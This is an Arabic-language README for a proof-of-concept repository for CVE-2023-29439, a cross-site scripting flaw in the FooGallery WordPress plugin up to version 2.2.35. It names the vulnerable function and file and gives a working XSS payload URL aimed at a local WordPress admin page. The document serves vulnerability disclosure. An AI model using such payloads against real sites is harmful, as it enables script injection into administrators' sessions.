
إثبات المفهوم لـ CVE-2023-29439
يتعلق هذا المستودع بثغرة XSS في إضافة Foogallery لـ Wordpress.
في Foogallery 2.2.35 والإصدارات الأقدم، تكون الدالة foogallery_image_editor_modal الموجودة في foogallery/includes/admin/class-gallery-attachment-modal.php عرضة لهجوم XSS.
http://localhost:8080/wp-admin/post-new.php?post_type=foogallery&post=”><script>alert(1)</script>